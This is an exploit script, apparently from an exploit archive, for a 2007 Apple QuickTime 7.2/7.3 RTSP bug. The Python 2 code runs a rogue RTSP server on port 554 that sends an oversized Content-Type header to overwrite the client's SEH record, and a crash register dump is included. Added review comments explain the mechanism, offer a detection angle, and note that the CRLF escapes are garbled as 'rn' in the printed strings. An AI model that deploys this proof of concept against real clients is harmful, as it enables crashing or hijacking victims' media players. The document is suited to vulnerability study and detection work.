# Title : Apple QuickTime 7.2/7.3 RTSP Response Remote SEH Overwrite PoC
# Published : 2007-11-23
# Author : h07
#!/usr/bin/python
# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish
# Details:..
#
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
#
# ----------------------------------------------------------------
# Exception C0000005 (ACCESS_VIOLATION reading [42424242])
# ----------------------------------------------------------------
# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00
# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00
# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
# --> N/A
# ----------------------------------------------------------------
##
from socket import *
# --- Defensive reading of this PoC --------------------------------------
# The script plays the *server* side of RTSP: it waits for a QuickTime
# client to connect on TCP/554 and answers with one crafted response.
# The only abnormal field is Content-Type, padded to 995 + 4096 bytes
# (see `tmp` below); the rest is an ordinary-looking SDP description.
# The register dump in the file header (ECX and EIP both 0x42424242,
# i.e. the "B" block) is what distinguishes this from a plain crash:
# the padding reaches the SEH record and handler, which is why SafeSEH/
# DEP-style hardening on the client and vendor patching are the fixes.
# Detection angle: an RTSP "200 OK" whose Content-Type header is several
# kilobytes long is anomalous and easy to match on at the network edge.
# NOTE(review): the literal 'rn' sequences below look like '\r\n' escapes
# whose backslashes were lost in extraction; as printed, the strings do
# not contain CRLF line endings. This is Python 2 code (print statement,
# raw_input).
header = (
'RTSP/1.0 200 OKrn'
'CSeq: 1rn'
'Date: 0x00 :Prn'
'Content-Base: rtsp://0.0.0.0/1.mp3/rn'
'Content-Type: %srn' # <-- oversized header field, filled from `tmp` below
'Content-Length: %drn'
'rn')
# SDP body; lengths here are only used for the Content-Length value,
# the body itself is not part of the overflow.
body = (
'v=0rn'
'o=- 16689332712 1 IN IP4 0.0.0.0rn'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'i=1.mp3rn'
't=0 0rn'
'a=tool:ciamciaramciarn'
'a=type:broadcastrn'
'a=control:*rn'
'a=range:npt=0-213.077rn'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'a=x-qt-text-inf:1.mp3rn'
'm=audio 0 RTP/AVP 14rn'
'c=IN IP4 0.0.0.0rn'
'a=control:track1rn'
)
# Padding: per the header comments, the 995 "A" bytes reach the next-SEH
# pointer (0x41414141) and the "B" bytes cover the handler (0x42424242).
tmp = "A" * 995
tmp += "B" * 4096
# Substitute the padding and the real body length into the header template.
header %= (tmp, len(body))
evil = header + body
# Listen on all interfaces; binding a port below 1024 needs elevated
# privileges on Unix-like hosts (the PoC was tested on Windows XP).
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
# The client's request is read and discarded without parsing; only the
# first 1024 bytes are consumed, whatever the request was.
c.recv(1024)
# send() return value (bytes actually written) is not checked.
c.send(evil)
# Keeps the process (and thus the sockets) alive until the operator
# confirms, presumably so the client has time to parse the response.
raw_input("[+] Done, press enter to quit")
c.close()
s.close()
# EoF